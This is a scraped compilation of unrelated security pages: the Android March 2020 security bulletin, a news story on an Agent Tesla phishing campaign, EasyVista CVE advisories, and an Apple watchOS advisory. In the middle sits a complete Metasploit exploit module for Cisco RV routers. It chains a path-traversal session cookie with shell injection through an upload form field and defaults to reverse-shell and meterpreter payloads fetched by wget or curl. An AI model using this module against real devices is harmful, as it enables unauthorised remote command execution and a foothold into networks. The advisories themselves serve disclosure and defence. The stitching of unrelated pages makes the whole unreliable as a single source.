In binder_transaction of binder.c, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-145988638References: Upstream kernel

_Published March 2, 2020 | Updated March 9, 2020_

The Android Security Bulletin contains details of security vulnerabilities affecting Android devices. Security patch levels of 2020-03-05 or later address all of these issues. To learn how to check a device's security patch level, see Check and update your Android version.

Android partners are notified of all issues at least a month before publication. Source code patches for these issues have been released to the Android Open Source Project (AOSP) repository and linked from this bulletin. This bulletin also includes links to patches outside of AOSP.

The most severe of these issues is a critical security vulnerability in the media framework that could enable a remote attacker using a specially crafted file to execute arbitrary code within the context of a privileged process. The severity assessment is based on the effect that exploiting the vulnerability would possibly have on an affected device, assuming the platform and service mitigations are turned off for development purposes or if successfully bypassed.

Refer to the Android and Google Play Protect mitigations section for details on the Android security platform protections and Google Play Protect, which improve the security of the Android platform.

**Android and Google service mitigations**

This is a summary of the mitigations provided by the Android security platform and service protections such as Google Play Protect. These capabilities reduce the likelihood that security vulnerabilities could be successfully exploited on Android.

*   Exploitation for many issues on Android is made more difficult by enhancements in newer versions of the Android platform. We encourage all users to update to the latest version of Android where possible.
*   The Android security team actively monitors for abuse through Google Play Protect and warns users about Potentially Harmful Applications. Google Play Protect is enabled by default on devices with Google Mobile Services, and is especially important for users who install apps from outside of Google Play.

**2020-03-01 security patch level vulnerability details**

In the sections below, we provide details for each of the security vulnerabilities that apply to the 2020-03-01 patch level. Vulnerabilities are grouped under the component that they affect. Issues are described in the tables below and include CVE ID, associated references, type of vulnerability, severity, and updated AOSP versions (where applicable). When available, we link the public change that addressed the issue to the bug ID, like the AOSP change list. When multiple changes relate to a single bug, additional references are linked to numbers following the bug ID. Devices with Android 10 and later may receive security updates as well as Google Play system updates.

**Framework**

The vulnerability in this section could enable a local malicious application to bypass operating system protections that isolate application data from other applications.

    

CVE

References

Type

Severity

Updated AOSP versions

CVE-2020-0031

A-141703197 \[2\]

ID

High

10

**Media framework**

The most severe vulnerability in this section could enable a remote attacker using a specially crafted file to execute arbitrary code within the context of a privileged process.

    

CVE

References

Type

Severity

Updated AOSP versions

CVE-2020-0032

A-145364230

RCE

Critical

8.0, 8.1, 9, 10

CVE-2020-0033

A-144351324

EoP

High

8.0, 8.1, 9, 10

CVE-2020-0034

A-62458770

ID

High

8.0, 8.1

**System**

The most severe vulnerability in this section could enable a local malicious application to bypass user interaction requirements in order to gain access to additional permissions.

    

CVE

References

Type

Severity

Updated AOSP versions

CVE-2020-0036

A-144679405

EoP

High

8.0, 8.1, 9, 10

CVE-2020-0035

A-140622024

ID

High

8.0, 8.1, 9

CVE-2020-0029

A-140065828

ID

High

10

CVE-2020-0037

A-143106535

ID

High

8.0, 8.1, 9, 10

CVE-2020-0038

A-143109193

ID

High

8.0, 8.1, 9, 10

CVE-2020-0039

A-143155861

ID

High

8.0, 8.1, 9, 10

**Google Play system updates**

The following issue is included in Project Mainline components.

 

Component

CVE

Media codecs

CVE-2020-0032

**2020-03-05 security patch level vulnerability details**

In the sections below, we provide details for each of the security vulnerabilities that apply to the 2020-03-05 patch level. Vulnerabilities are grouped under the component they affect and include details such as the CVE, associated references, type of vulnerability, severity, component (where applicable), and updated AOSP versions (where applicable). When available, we link the public change that addressed the issue to the bug ID, such as the AOSP change list. When multiple changes relate to a single bug, additional references are linked to numbers following the bug ID.

**Kernel components**

The most severe vulnerability in this section could enable a local attacker using a specially crafted USB device to execute arbitrary code within the context of a privileged process.

    

CVE

References

Type

Severity

Component

CVE-2019-19527

A-146257915  
Upstream kernel \[2\]

EoP

High

USB

CVE-2019-19537

A-146258055  
Upstream kernel

EoP

High

USB

CVE-2019-15239

A-143009752  
Upstream kernel

EoP

High

Networking

CVE-2020-0041

A-145988638  
Upstream kernel

EoP

High

Binder

**FPC components**

The most severe vulnerability in this section could enable a local malicious application to bypass user interaction requirements in order to gain access to additional permissions.

    

CVE

References

Type

Severity

Component

CVE-2020-0010

A-137014293\*

EoP

High

FPC Fingerprint TEE

CVE-2020-0011

A-137648045\*

EoP

High

FPC Fingerprint TEE

CVE-2020-0012

A-137648844\*

EoP

High

FPC Fingerprint TEE

CVE-2020-0042

A-137649599\*

ID

Moderate

FPC Fingerprint TEE

CVE-2020-0043

A-137650218\*

ID

Moderate

FPC Fingerprint TEE

CVE-2020-0044

A-137650219\*

ID

Moderate

FPC Fingerprint TEE

**MediaTek components**

    

CVE

References

Type

Severity

Component

CVE-2020-0069

A-147882143\*  
M-ALPS04356754

EoP

High

System

**Qualcomm components**

These vulnerabilities affect Qualcomm components and are described in further detail in the appropriate Qualcomm security bulletin or security alert. The severity assessment of these issues is provided directly by Qualcomm.

    

CVE

References

Type

Severity

Component

CVE-2019-14079

A-138848422  
QC-CR#2521001

N/A

High

USB

CVE-2018-11838

A-145545090  
QC-CR#221457 \[2\]

N/A

High

WLAN

CVE-2019-10526

A-145544085  
QC-CR#2232526  
QC-CR#2541970

N/A

High

WLAN

CVE-2019-10569

A-145545820  
QC-CR#2315791

N/A

High

Audio

CVE-2019-14029

A-145546793  
QC-CR#2528795

N/A

High

Graphics

CVE-2019-14032

A-145546652  
QC-CR#2537311

N/A

High

Audio

CVE-2019-14068

A-145546435  
QC-CR#2507653 \[2\]

N/A

High

Audio

CVE-2019-14072

A-145545251  
QC-CR#2509391

N/A

High

Graphics

**Qualcomm closed-source components**

These vulnerabilities affect Qualcomm closed-source components and are described in further detail in the appropriate Qualcomm security bulletin or security alert. The severity assessment of these issues is provided directly by Qualcomm.

    

CVE

References

Type

Severity

Component

CVE-2019-2317

A-134436812\*

N/A

Critical

Closed-source component

CVE-2019-10586

A-140423909\*

N/A

Critical

Closed-source component

CVE-2019-10587

A-140423816\*

N/A

Critical

Closed-source component

CVE-2019-10593

A-140424165\*

N/A

Critical

Closed-source component

CVE-2019-10594

A-140424564\*

N/A

Critical

Closed-source component

CVE-2019-10612

A-140423161\*

N/A

Critical

Closed-source component

CVE-2019-14031

A-142271912\*

N/A

Critical

Closed-source component

CVE-2019-14045

A-140973418\*

N/A

Critical

Closed-source component

CVE-2019-14071

A-145545489\*

N/A

Critical

Closed-source component

CVE-2019-14083

A-140973259\*

N/A

Critical

Closed-source component

CVE-2019-14086

A-140973417\*

N/A

Critical

Closed-source component

CVE-2019-14030

A-145546515\*

N/A

Critical

Closed-source component

CVE-2019-14097

A-145546003\*

N/A

Critical

Closed-source component

CVE-2019-14098

A-145546314\*

N/A

Critical

Closed-source component

CVE-2019-10546

A-145545250\*

N/A

Critical

Closed-source component

CVE-2019-14095

A-142843397\*

N/A

Critical

Closed-source component

CVE-2018-11970

A-114042111\*

N/A

High

Closed-source component

CVE-2019-10603

A-140424074\*

N/A

High

Closed-source component

CVE-2019-10616

A-140423338\*

N/A

High

Closed-source component

CVE-2019-10549

A-140423162\*

N/A

High

Closed-source component

CVE-2019-10550

A-140423702\*

N/A

High

Closed-source component

CVE-2019-10552

A-140423817\*

N/A

High

Closed-source component

CVE-2019-10553

A-140423081\*

N/A

High

Closed-source component

CVE-2019-10554

A-140424012\*

N/A

High

Closed-source component

CVE-2019-10577

A-140424166\*

N/A

High

Closed-source component

CVE-2019-14026

A-142271986\*

N/A

High

Closed-source component

CVE-2019-14027

A-142271756\*

N/A

High

Closed-source component

CVE-2019-14028

A-142271831\*

N/A

High

Closed-source component

CVE-2019-2300

A-142271659\*

N/A

High

Closed-source component

CVE-2019-2311

A-142271967\*

N/A

High

Closed-source component

CVE-2019-14050

A-143902706\*

N/A

High

Closed-source component

CVE-2019-14081

A-143902882\*

N/A

High

Closed-source component

CVE-2019-14082

A-140974589\*

N/A

High

Closed-source component

CVE-2019-14085

A-143902807\*

N/A

High

Closed-source component

CVE-2019-14048

A-145545282\*

N/A

High

Closed-source component

CVE-2019-14061

A-145545758\*

N/A

High

Closed-source component

CVE-2019-10604

A-145545725\*

N/A

High

Closed-source component

CVE-2019-10591

A-145545283\*

N/A

High

Closed-source component

CVE-2019-14000

A-145546434\*

N/A

High

Closed-source component

CVE-2019-14015

A-145545650\*

N/A

High

Closed-source component

**Common questions and answers**

This section answers common questions that may occur after reading this bulletin.

**1\. How do I determine if my device is updated to address these issues?**

To learn how to check a device's security patch level, see Check and update your Android version.

*   Security patch levels of 2020-03-01 or later address all issues associated with the 2020-03-01 security patch level.
*   Security patch levels of 2020-03-05 or later address all issues associated with the 2020-03-05 security patch level and all previous patch levels.

Device manufacturers that include these updates should set the patch string level to:

*   \[ro.build.version.security\_patch\]:\[2020-03-01\]
*   \[ro.build.version.security\_patch\]:\[2020-03-05\]

For some devices on Android 10 or later, the Google Play system update will have a date string that matches the 2020-03-01 security patch level. Please see this article for more details on how to install security updates.

**2\. Why does this bulletin have two security patch levels?**

This bulletin has two security patch levels so that Android partners have the flexibility to fix a subset of vulnerabilities that are similar across all Android devices more quickly. Android partners are encouraged to fix all issues in this bulletin and use the latest security patch level.

*   Devices that use the 2020-03-01 security patch level must include all issues associated with that security patch level, as well as fixes for all issues reported in previous security bulletins.
*   Devices that use the security patch level of 2020-03-05 or newer must include all applicable patches in this (and previous) security bulletins.

Partners are encouraged to bundle the fixes for all issues they are addressing in a single update.

**3\. What do the entries in the _Type_ column mean?**

Entries in the _Type_ column of the vulnerability details table reference the classification of the security vulnerability.

 

Abbreviation

Definition

RCE

Remote code execution

EoP

Elevation of privilege

ID

Information disclosure

DoS

Denial of service

N/A

Classification not available

**4\. What do the entries in the _References_ column mean?**

Entries under the _References_ column of the vulnerability details table may contain a prefix identifying the organization to which the reference value belongs.

 

Prefix

Reference

A-

Android bug ID

QC-

Qualcomm reference number

M-

MediaTek reference number

N-

NVIDIA reference number

B-

Broadcom reference number

**5\. What does an \* next to the Android bug ID in the _References_ column mean?**

Issues that are not publicly available have an \* next to the Android bug ID in the _References_ column. The update for that issue is generally contained in the latest binary drivers for Pixel devices available from the Google Developer site.

**6\. Why are security vulnerabilities split between this bulletin and device / partner security bulletins, such as the Pixel bulletin?**

Security vulnerabilities that are documented in this security bulletin are required to declare the latest security patch level on Android devices. Additional security vulnerabilities that are documented in the device / partner security bulletins are not required for declaring a security patch level. Android device and chipset manufacturers may also publish security vulnerability details specific to their products, such as Google, Huawei, LGE, Motorola, Nokia, or Samsung.

**Versions**

  

Version

Date

Notes

1.0

March 2, 2020

Bulletin published

1.1

March 3, 2020

Bulletin revised to include AOSP links

1.2

March 9, 2020

Updated issue list

CVE-2020-0041: Android Security Bulletin—March 2020  |  Android Open Source Project

This Metasploit module exploits two vulnerabilities, a session ID directory traversal authentication bypass (CVE-2022-20705) and a command injection vulnerability (CVE-2022-20707), on Cisco RV160, RV260, RV340, and RV345 Small Business Routers, allowing attackers to execute arbitrary commands with www-data user privileges. This access can then be used to pivot to other parts of the network. This module works on firmware versions 1.0.03.24 and below.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  include Msf::Exploit::FileDropper  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Cisco RV Series Authentication Bypass and Command Injection',        'Description' => %q{          This module exploits two vulnerabilities, a session ID directory traversal authentication          bypass (CVE-2022-20705) and a command injection vulnerability (CVE-2022-20707), on Cisco RV160, RV260, RV340,          and RV345 Small Business Routers, allowing attackers to execute arbitrary commands with www-data user privileges.          This access can then be used to pivot to other parts of the network. This module works on firmware          versions 1.0.03.24 and below.        },        'License' => MSF_LICENSE,        'Platform' => ['linux', 'unix'],        'Author' => [          'Biem Pham',  # Vulnerability Discoveries          'Neterum',    # Metasploit Module          'jbaines-r7'  # Inspired from cisco_rv_series_authbypass_and_rce.rb        ],        'DisclosureDate' => '2021-11-02',        'Arch' => [ARCH_CMD, ARCH_ARMLE],        'References' => [          ['CVE', '2022-20705'], # Authentication Bypass          ['CVE', '2022-20707'], # Command Injection          ['ZDI', '22-410'], # Authentication Bypass          ['ZDI', '22-411']  # Command Injection        ],        'Targets' => [          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'Payload' => {                'BadChars' => '\'#'              },              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_netcat'              }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ARCH_ARMLE],              'Type' => :linux_dropper,              'Payload' => {                'BadChars' => '\'#'              },              'CmdStagerFlavor' => [ 'wget', 'curl' ],              'DefaultOptions' => {                'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'RPORT' => 443,          'SSL' => true,          'MeterpreterTryToFork' => true        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options(      [        OptString.new('TARGETURI', [true, 'Base path', '/'])      ]    )  end  # sessionid utilized later needs to be set to length  # of 16 or exploit will fail. Tested with lengths  # 14-17  def generate_session_id    return Rex::Text.rand_text_alphanumeric(16)  end  def check    res = send_request_cgi({      'method' => 'GET',      'uri' => '/upload',      'headers' => {        'Cookie' => 'sessionid =../../www/index.html; sessionid=' + generate_session_id      }    }, 10)    # A proper "upload" will trigger file creation. So the send_request_cgi call    # above is an incorrect "upload" call to avoid creating a file on disk. The router will return    # status code 405 Not Allowed if authentication has been bypassed by the above request.    # The firmware containing this authentication bypass also contains the command injection    # vulnerability that will be abused during actual exploitation. Non-vulnerable    # firmware versions will respond with 403 Forbidden.    if res.nil?      return CheckCode::Unknown('The device did not respond to request packet.')    elsif res.code == 405      return CheckCode::Appears('The device is vulnerable to authentication bypass. Likely also vulnerable to command injection.')    elsif res.code == 403      return CheckCode::Safe('The device is not vulnerable to exploitation.')    else # Catch-all      return CheckCode::Unknown('The target responded in an unexpected way. Exploitation is unlikely.')    end  end  def execute_command(cmd, _opts = {})    res = send_exploit(cmd)    # Successful unix_cmd shells should not produce a response.    # However if a response is returned, check the status code and return    # Failure::NotVulnerable if it is 403 Forbidden.    if target['Type'] == :unix_cmd && res&.code == 403      fail_with(Failure::NotVulnerable, 'The target responded with 403 Forbidden and is not vulnerable')    end    if target['Type'] == :linux_dropper      fail_with(Failure::Unreachable, 'The target did not respond') unless res      fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res&.code == 200      begin        body_json = res.get_json_document        fail_with(Failure::UnexpectedReply, 'The target did not respond with a JSON body') unless body_json      rescue JSON::ParserError => e        print_error("Failed: #{e.class} - #{e.message}")        fail_with(Failure::UnexpectedReply, 'Failed to parse the response returned from the server! Its possible the response may not be JSON!')      end    end    print_good('Exploit successfully executed.')  end  def send_exploit(cmd)    filename = Rex::Text.rand_text_alphanumeric(5..12)    fileparam = Rex::Text.rand_text_alphanumeric(5..12)    input = Rex::Text.rand_text_alphanumeric(5..12)    # sessionid utilized later needs to be set to length    # of 16 or exploit will fail. Tested with lengths    # 14-17    sessionid = Rex::Text.rand_text_alphanumeric(16)    filepath = '/tmp/upload.input' # This file must exist and be writeable by www-data so we just use the temporary upload file to prevent issues.    pathparam = 'Configuration'    destination = "'; " + cmd + ' #'    multipart_form = Rex::MIME::Message.new    multipart_form.add_part(filepath, nil, nil, 'form-data; name="file.path"')    multipart_form.add_part(filename, nil, nil, 'form-data; name="filename"')    multipart_form.add_part(pathparam, nil, nil, 'form-data; name="pathparam"')    multipart_form.add_part(fileparam, nil, nil, 'form-data; name="fileparam"')    multipart_form.add_part(destination, nil, nil, 'form-data; name="destination"')    multipart_form.add_part(input, 'application/octet-stream', nil, format('form-data; name="input"; filename="%<filename>s"', filename: filename))    # Escaping "/tmp/upload/" folder that does not contain any other permanent files    send_request_cgi({      'method' => 'POST',      'uri' => '/upload',      'ctype' => "multipart/form-data; boundary=#{multipart_form.bound}",      'headers' => {        'Cookie' => 'sessionid =../../www/index.html; sessionid=' + sessionid      },      'data' => multipart_form.to_s    }, 10)  end  def exploit    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    case target['Type']    when :unix_cmd      execute_command(payload.encoded)    when :linux_dropper      execute_cmdstager(linemax: 120)    end  endend

Cisco RV Series Authentication Bypass / Command Injection

Latest campaign underscores wide-ranging functionality and staying power of a decade-old piece of information-stealing malware.

Source: David Chapman via Alamy

More than 11,000 Australian companies were targeted in a recent wave of cyberattacks that rely on an aging but still dangerous malware strain dubbed Agent Tesla.

Prospective victims were bombarded by booby-trapped emails with lures about purchasing goods and order delivery inquiries that came with a malicious attachment. Victims who were tricked into opening the attachment exposed their Windows PCs to Agent Tesla infections.

Agent Tesla is a remote access Trojan (RAT) that first surfaced in 2014. The malware is widely distributed and frequently used by a variety of threat actors, including cybercriminals and spies, according to researchers at Check Point Software.

Alexander Chailytko, cybersecurity, research, and innovation manager at Check Point, says threat actors have "developed a level of trust" in Agent Tesla's capabilities.

"Its reliability, coupled with its diverse range of functionalities for data exfiltration and information theft, makes it a preferred choice among cybercriminals," Chailytko explains.

The malware offers a range of data exfiltration methods and stealing capabilities that target the most commonly used software, ranging from browsers to FTP clients. Recent updates to the malware offer tighter integration with platforms such as Telegram and Discord, which makes it easier for crooks to run hacking campaigns.

Agent Tesla was in the news last year, when cybercriminals exploited a 6-year-old Microsoft Office remote execution flaw to sling Agent Tesla.

**Anatomy of an Agent Tesla Hack**

An analysis by security researchers from Check Point published in a blog post this week offered one of the most detailed inspections of the methodology of an Agent Tesla-based phishing campaign to date. Their work offers a postmortem on a high-volume series of attacks launched in November 2023 against mostly Australian and American targets.

Check Point said a threat actor dubbed "Bignosa" first installed Plesk (for hosting) and Round Cube (email client) onto a hosted server. The attackers then disguised the Agent Tesla payload using a package called Cassandra Protector that hid the malicious code and controlled its delivery.

Cassandra Protector bundles a variety of options that allow cybercriminals to configure sleep time before execution. Among other functions, it controls the text in the fake dialogue box that appears when victims open a malicious file.

Once Agent Tesla was "protected" this way, Bignosa converted the malicious .NET code into an ISO file with a ".img" extension before attaching the resulting file to the spam emails.

Next, Bignosa connected to the newly configured machine via a remote access network protocol connection, created an email address, logged in to webmail, and launched the spam run using a pre-prepared target list. According to Check Point, "a few successful infections" hit Australia in a first wave of the attack.

**Down Under**

The threat actors behind the Agent Tesla malware campaign were primarily targeting Australian businesses, as shown by the presence of a mailing list file named "AU B2B Lead.txt" on their machines.

"This suggests a deliberate effort to compile and target email addresses linked to Australian business entities, potentially for the purpose of infiltrating corporate networks with the goal of extracting valuable information for financial exploitation," Check Point's Chailytko says.

Bignosa also worked with another more proficient cybercriminal, who immodestly goes by "Gods," in a campaign to hack into Australian and US-based businesses, the researchers found.

Gods offered advice to Bignosa on the content of malicious spam text, according to Jabber chat logs uncovered by the security researchers.

Like with other cybercriminals, the duo struggled with elements of their cybercrime campaign, according to evidence uncovered by Check Point.

In multiple instances, Bignosa wasn't able to clean his machine from the Agent Tesla test infections, so the hapless hacker had to call on remote access from Gods for assistance.

Check Point said it believes that Bignosa is Kenyan and Gods is a Nigerian with a day job as a Web developer.

**How to Block Agent Tesla Infections**

The Agent Tesla-based spear-phishing campaign highlighted by Check Point underscores the still-prevalent threat posed by the mature malware.

Businesses should maintain up-to-date operating systems and applications by promptly installing patches and utilizing other security measures. Commercial spam filtering and blocklist tools can help minimize the volume of junk traffic that appears in user inboxes, according to Check Point.

Even so, end users must exercise caution when encountering unexpected emails containing links, particularly from unfamiliar senders. According to Check Point, that's where regular employee training and education programs can bolster cybersecurity awareness.

**About the Author(s)**

John Leyden is an experienced cybersecurity writer, having previously written for the Register and Daily Swig.

Image source: Dorota Szymczyk via Alamy Stock Photo

Thousands of Australian Businesses Targeted With 'Reliable' Agent Tesla RAT

An issue was discovered in EasyVista 2020.2.125.3 and 2022.1.109.0.03 before 2022.1.110.1.02. One parameter allows SQL injection.

**Abstract Advisory Information**

One of the parameters is vulnerable to SQL injections.

Author: Valentin Giannini & Alexis Pain

**Version affected**

Name: Easy Vista

Versions: 2020.2.125.3 & 2022.1.109.0.03

**Common Vulnerability Scoring System**

7.7

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

**Patch**

2022.1.110.1.02

**References**

*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38492

**Vulnerability Disclosure Timeline**

*   17/05/2022: Vulnerability discovery
*   18/05/2022: Vulnerability Report to CERT-XLM
*   19/05/2022: Vulnerability Report to Vendor through Contact Form
*   24/05/2022: Vulnerability Report to Vendor through investigation at “supptech@easyvista.com”
*   24/05/2022: Vulnerability Report to Vendor through Contact Form
*   03/06/2022: Vulnerability Report to Vendor through investigation at “supptech@easyvista.com”
*   03/06/2022: Vulnerability Report to Vendor through Contact Form
*   03/06/2022: Vendor called, redirect us to support team08/07/2022: Vulnerability Report to Vendor through investigation at multiple contact point
*   25/07/2022: Vulnerability Report sent to Vendor through multiple investigations at security contact point
*   25/07/2022: Phonecall with Vendor
*   19/08/2022: Updates asked to vendor through multiple investigations
*   19/08/2022: Updates received from Vendor, fix is done **(now awaiting fix for other CVE)**
*   20/08/2022: Request CVE ID to Mitre
*   20/08/2022: CVE IDs assigned
*   26/08/2022: Updates asked to vendor
*   02/09/2022: Updates asked to vendor and CVE ID sent to vendor
*   05/09/2022: Meeting with vendor to prepare the publication
*   30/09/2022: Updates asked to vendor
*   04/10/2022: Multiple calls attempts to the vendors
*   31/10/2022: Expected Vulnerability disclosure

Our website uses cookies technologies to assist with navigation and your ability to provide feedback, analyze your use of our products and services, to enable you to use the social media functionalities and assist with our promotional and marketing efforts, and provide content from third parties. You may choose to opt-out from all non-essential cookie or allow them for a better browsing experience. For more information on the use of cookies, Please check our Privacy Notice ACCEPT REJECT

CVE-2022-38492: CVE-2022-38492 - Excellium Services

An issue was discovered in EasyVista 2020.2.125.3 and 2022.1.109.0.03. Part of the application does not implement protection against brute-force attacks.

**Abstract Advisory Information**

A part of the application is vulnerable to brute-force attack.

Author: Valentin Giannini & Alexis Pain

**Version affected**

Name: Easy Vista

Versions: 2020.2.125.3 & 2022.1.109.0.03

**Common Vulnerability Scoring System**

8.2

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

**Patch**

<TBD>

**References**

*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38491

**Vulnerability Disclosure Timeline**

*   17/05/2022: Vulnerability discovery
*   18/05/2022: Vulnerability Report to CERT-XLM
*   19/05/2022: Vulnerability Report to Vendor through Contact Form
*   24/05/2022: Vulnerability Report to Vendor through investigation at “supptech@easyvista.com”
*   24/05/2022: Vulnerability Report to Vendor through Contact Form
*   03/06/2022: Vulnerability Report to Vendor through investigation at “supptech@easyvista.com”
*   03/06/2022: Vulnerability Report to Vendor through Contact Form
*   03/06/2022: Vendor called, redirect us to support team
*   08/07/2022: Vulnerability Report to Vendor through investigation at multiple contact point
*   25/07/2022: Vulnerability Report sent to Vendor through multiple investigations at security contact point
*   25/07/2022: Phonecall with Vendor
*   19/08/2022: Updates asked to vendor through multiple investigations
*   19/08/2022: Fix is ongoing
*   20/08/2022: Request CVE ID to Mitre
*   20/08/2022: CVE IDs assigned
*   26/08/2022: Updates asked to vendor
*   02/09/2022: Updates asked to vendor and CVE ID sent to vendor
*   05/09/2022: Meeting with vendor to prepare the publication
*   30/09/2022: Updates asked to vendor
*   04/10/2022: Multiple calls attempts to the vendors
*   14/11/2022: Expected Vulnerability disclosure

Our website uses cookies technologies to assist with navigation and your ability to provide feedback, analyze your use of our products and services, to enable you to use the social media functionalities and assist with our promotional and marketing efforts, and provide content from third parties. You may choose to opt-out from all non-essential cookie or allow them for a better browsing experience. For more information on the use of cookies, Please check our Privacy Notice ACCEPT REJECT

CVE-2022-38491: CVE-2022-38491 - Excellium Services

An issue was discovered in EasyVista 2020.2.125.3 and 2022.1.109.0.03. Some parameters allow SQL injection.

**Abstract Advisory Information**

Some parameters are prone to SQL injections.

Author: Valentin Giannini & Alexis Pain

**Version affected**

Name: EasyVista

Versions: 2020.2.125.3 & 2022.1.109.0.03

**Common Vulnerability Scoring System**

9.6

CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N

**Patch**

2020.2.125.3 & 2022.1.109.0.03

**References**

*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38490

**Vulnerability Disclosure Timeline**

*   17/05/2022: Vulnerability discovery
*   18/05/2022: Vulnerability Report to CERT-XLM
*   19/05/2022: Vulnerability Report to Vendor through Contact Form
*   24/05/2022: Vulnerability Report to Vendor through investigation at “supptech@easyvista.com”
*   24/05/2022: Vulnerability Report to Vendor through Contact Form
*   03/06/2022: Vulnerability Report to Vendor through investigation at “supptech@easyvista.com”
*   03/06/2022: Vulnerability Report to Vendor through Contact Form
*   03/06/2022: Vendor called, redirect us to support team08/07/2022: Vulnerability Report to Vendor through investigation at multiple contact point
*   25/07/2022: Vulnerability Report sent to Vendor through multiple investigations at security contact point
*   25/07/2022: Phonecall with Vendor
*   19/08/2022: Updates asked to vendor through multiple investigations
*   19/08/2022: Updates received from Vendor, fix is done **(now awaiting fix for other CVE)**
*   20/08/2022: Request CVE ID to Mitre
*   20/08/2022: CVE IDs assigned
*   26/08/2022: Updates asked to vendor
*   02/09/2022: Updates asked to vendor and CVE ID sent to vendor
*   05/09/2022: Meeting with vendor to prepare the publication
*   30/09/2022: Updates asked to vendor
*   04/10/2022: Multiple calls attempts to the vendors
*   31/10/2022: Expected Vulnerability disclosure

Our website uses cookies technologies to assist with navigation and your ability to provide feedback, analyze your use of our products and services, to enable you to use the social media functionalities and assist with our promotional and marketing efforts, and provide content from third parties. You may choose to opt-out from all non-essential cookie or allow them for a better browsing experience. For more information on the use of cookies, Please check our Privacy Notice ACCEPT REJECT

CVE-2022-38490: CVE-2022-38490 - Excellium Services

Apple Security Advisory 2023-09-21-4 - watchOS 10.0.1 addresses bypass vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2023-09-21-4 watchOS 10.0.1

watchOS 10.0.1 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT213928.

Apple maintains a Security Updates page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

Kernel  
Available for: Apple Watch Series 4 and later  
Impact: A local attacker may be able to elevate their privileges. Apple  
is aware of a report that this issue may have been actively exploited  
against versions of iOS before iOS 16.7.  
Description: The issue was addressed with improved checks.  
CVE-2023-41992: Bill Marczak of The Citizen Lab at The University of  
Toronto's Munk School and Maddie Stone of Google's Threat Analysis Group

Security  
Available for: Apple Watch Series 4 and later  
Impact: A malicious app may be able to bypass signature  
validation. Apple is aware of a report that this issue may have been  
actively exploited against versions of iOS before iOS 16.7.  
Description: A certificate validation issue was addressed.  
CVE-2023-41991: Bill Marczak of The Citizen Lab at The University of  
Toronto's Munk School and Maddie Stone of Google's Threat Analysis Group

Instructions on how to update your Apple Watch software are available  
at https://support.apple.com/kb/HT204641  To check the version on  
your Apple Watch, open the Apple Watch app on your iPhone and select  
"My Watch > General > About".  Alternatively, on your watch, select  
"My Watch > General > About".  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmUMi+QACgkQX+5d1TXa  
Ivrolg//eCfa6uj7rYz+BwmO2KTNLG+gAn+NZ9hnFb/txI8aoIwYc5rxDM8ektDP  
itxupK30fcz3cG3fdWazD8YQ16Q7nN9KgU1alLELMZCgBI9K9osMGHzwzCepF1bJ  
gaIt6e/DT6nEruNbtR9DOvZYFK0bBaM+Iar6GZ9NgSP8KwXZjRgCUBtaYuKEu2z4  
K3xic4l0iKbV6T+Wb2hoinsRYjD5vf85q/6qcufRzUdBzpCyy6jEmMZs0CKnCef7  
joEtz1tCVOydrydWXDNrmVXm5BLjBp4Fo3+i5O+zXXJvOaFdvHsbZ9IXmdMR2Zrz  
YY7XxCawuRopfTAsNmnl8dYGGA2u9hSNmxienTCReYfF2gY6QG9tUpnS6TYkv1+3  
HT/W5or4HLlVQvG4M+6ZOLIL/RlCBlnJBP7L78FYQW/0650FU6Xq3UoeQIx5LBf2  
xtz4Dk/Dd/hF0dpGgRtg/Qw1ZqMZbwSgM4Z9yNOT1BnDWKgPyyl4Cg8D50ua4jyH  
eGXUOQhM8hUoaIYjyNe2HM44tW3zZue/eXdu2xLL0LqwBWu4nEZBoyXHJLZHCtYq  
W3KFBpcK3xgXujoknsu+X4Lq/oKH9SdPVmExkIZ/3Ga+8W2pYS3vIhRglt/Cuiis  
xezTX8F3NjxIIztlBwlIgIGcdhb3pFRm7YqMwXykxOIpevPAyRM=  
=zsee  
-----END PGP SIGNATURE-----

Apple Security Advisory 2023-09-21-4

